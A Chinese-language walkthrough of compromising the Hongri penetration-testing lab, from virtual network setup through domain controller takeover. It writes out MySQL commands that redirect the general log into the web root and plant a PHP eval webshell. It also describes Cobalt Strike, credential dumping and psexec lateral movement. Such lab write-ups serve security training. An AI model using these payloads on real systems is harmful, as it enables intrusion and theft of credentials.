红日靶场渗透记录(一)

红日靶场渗透记录(一)

首先是配置虚拟机的网络

这里需要新建一张192.168.52.0/24网段的仅主机网卡

一台域成员和一台域控处于内网,直接将虚拟网卡设置为仅主机就可以了

但是web服务器则是同时处于内网和外网,正常情况下本地做只需要把网络适配器设置成仅主机,然后网络适配器2设置为NAT就行了,但我这是在实验室的一台服务器上搭的,所以网络适配器2需要设置成桥接模式,然后配置到实验室局域网的网段

需要注意的是网络适配器是静态ip,网络适配器2是DHCP,所以顺序不能搞反,别问我怎么知道的;w;

然后只需要将win7的phpstudy打开就可以访问web服务了

先用nmap扫一下

然后查看一下web服务,是个php探针,可以看到phpstudy的路径是C:/phpStudy/WWW

再用dirsearch一扫,有个phpmyadmin

是个弱口令,账户密码都是root

查看日志信息,日志是关的

1
SHOW VARIABLES LIKE '%general%'

把日志打开

1
SET GLOBAL general_log='on';

更改日志输出位置

1
set global general_log_file = 'C:/phpStudy/WWW/a.php'

上马

1
SELECT '<?php @eval($_POST["a"]);?>'

蚁剑连接

开启cs4.5

*cs4.8生成的马子和这台老旧的靶机不兼容*

创建监听器,生成木马

通过蚁剑上传木马,运行

成功上线

然后浅浅提个权

成功提升到SYSTEM权限,

然后再探测一下192.168.52.0网段的其他主机

利用SYSTEM权限抓取一下明文密码

之后再创建一个SMB的监听器,通过psexec横向移动拿下域控制器

再通过域控制器横移拿下域成员